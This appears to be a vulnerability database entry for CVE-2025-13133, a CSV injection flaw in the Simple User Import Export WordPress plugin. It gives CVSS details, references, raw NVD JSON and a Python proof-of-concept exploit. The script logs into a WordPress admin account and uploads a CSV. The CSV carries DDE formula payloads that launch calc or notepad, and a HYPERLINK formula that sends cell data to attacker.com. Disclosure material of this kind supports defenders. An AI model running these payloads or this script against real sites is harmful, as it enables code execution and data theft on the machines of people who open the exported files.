CVE-2025-13133

Description

The Simple User Import Export plugin for WordPress is vulnerable to CSV Injection in all versions up to, and including, 1.1.7 via the 'Import/export users' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration

CVSS Details

CVSS Score

6.6

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Simple User Import Export (a3 User Importer) <= 1.1.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3 """ CVE-2025-13133 PoC - Simple User Import Export CSV Injection This PoC demonstrates how to inject malicious formulas into CSV export """ import requests from bs4 import BeautifulSoup import re # Configuration TARGET_URL = "http://vulnerable-wordpress-site.com" USERNAME = "admin" PASSWORD = "admin_password" # Malicious CSV injection payloads PAYLOADS = [ '=CMD|\'/C calc\'!A0', # Windows calc execution '=HYPERLINK("http://attacker.com/steal?data="&A1)', # Data exfiltration '+HYPERLINK(,"cmd\'/c calc\'!A0)', # Alternative calc '-2+3+CMD|\'/C notepad\'!A0', # Notepad execution ] def exploit(): """ Step 1: Authenticate as admin user Step 2: Import users with malicious CSV formula in username field Step 3: Export users to trigger payload execution """ session = requests.Session() # Login login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/' } resp = session.post(login_url, data=login_data) if 'error' in resp.text.lower(): print("[-] Login failed") return False print("[+] Login successful") # Access plugin import page import_url = f"{TARGET_URL}/wp-admin/admin.php?page=a3-user-importer" resp = session.get(import_url) # Prepare malicious CSV data with formula injection malicious_csv = "Username,Email,Role\n" for payload in PAYLOADS: malicious_csv += f"{payload},[email protected],administrator\n" # Upload malicious CSV files = {'upload_file': ('users.csv', malicious_csv, 'text/csv')} data = {'action': 'a3_import_users'} resp = session.post(import_url, files=files, data=data) if resp.status_code == 200: print("[+] Malicious CSV uploaded successfully") print("[*] When admin exports users, the CSV will contain malicious formulas") print("[*] Opening the exported CSV in Excel will trigger code execution") return True if __name__ == "__main__": exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13133
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13133
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13133/
[4] VulDB https://vuldb.com/cve/CVE-2025-13133
[5] https://it.wordpress.org/plugins/a3-user-importer/
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/39ec49b4-f0f3-4ec7-b11b-ce808c025577?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13133", "sourceIdentifier": "[email protected]", "published": "2025-11-18T10:15:49.420", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Simple User Import Export plugin for WordPress is vulnerable to CSV Injection in all versions up to, and including, 1.1.7 via the 'Import/export users' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1236"}]}], "references": [{"url": "https://it.wordpress.org/plugins/a3-user-importer/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/39ec49b4-f0f3-4ec7-b11b-ce808c025577?source=cve", "source": "[email protected]"}]}}